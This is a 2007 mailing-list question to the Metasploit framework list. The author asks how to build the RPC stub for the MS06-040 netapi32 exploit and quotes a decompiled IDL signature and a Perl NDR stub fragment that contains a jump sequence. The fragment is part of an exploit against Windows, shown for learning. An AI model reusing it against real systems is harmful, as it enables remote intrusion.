[framework] Help Understanding Stub for MS06-040

[Kyle Schatzle]

Hello,

I'm researching RPC vulnerabilities and trying to recreate MS06-040's
metasploits exploit for a proof of concept to myself.  I understand most of
the code, but am missing the main part, creating the stub.  Could you point
me in the right direction to understand how to build this?        ( minus
the payload, I can understand (most of) the payload)  I thought I could
disassemble the netapi32.dll and recreate the IDL file, but was unsuccessful
with using mIDA, and unmidl.

Does this function relate to the stub below?

    #  /* Function 0x1f at 0x767e912c */
    #  long function_1f (
    #    [in] [unique] [string] wchar_t * arg_00,
    #    [in] [string] wchar_t * arg_01,
    #    [out] [size_is(arg_03)] char * arg_02,
    #    [in] [range(0, 64000)] long arg_03,
    #    [in] [string] wchar_t * arg_04,
    #    [in,out] long * arg_05,
    #    [in] long arg_06
    #  );
    #

If it doesn't relate, could you point me in the right direction to
understand its format?

        $stub =
            Pex::NDR::Long(int(rand(0xffffffff))).
            Pex::NDR::UnicodeConformantVaryingString('').
            Pex::NDR::UnicodeConformantVaryingStringPreBuilt($path).
            Pex::NDR::Long(int(rand(250)+1)).
            Pex::NDR::UnicodeConformantVaryingStringPreBuilt( "\xeb\x02" .
"\x00\x00").
            Pex::NDR::Long(int(rand(250)+1)).
            Pex::NDR::Long(0);

Thanks
KyleS
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://spool.metasploit.com/pipermail/framework/attachments/20070314/c51e2f24/attachment.htm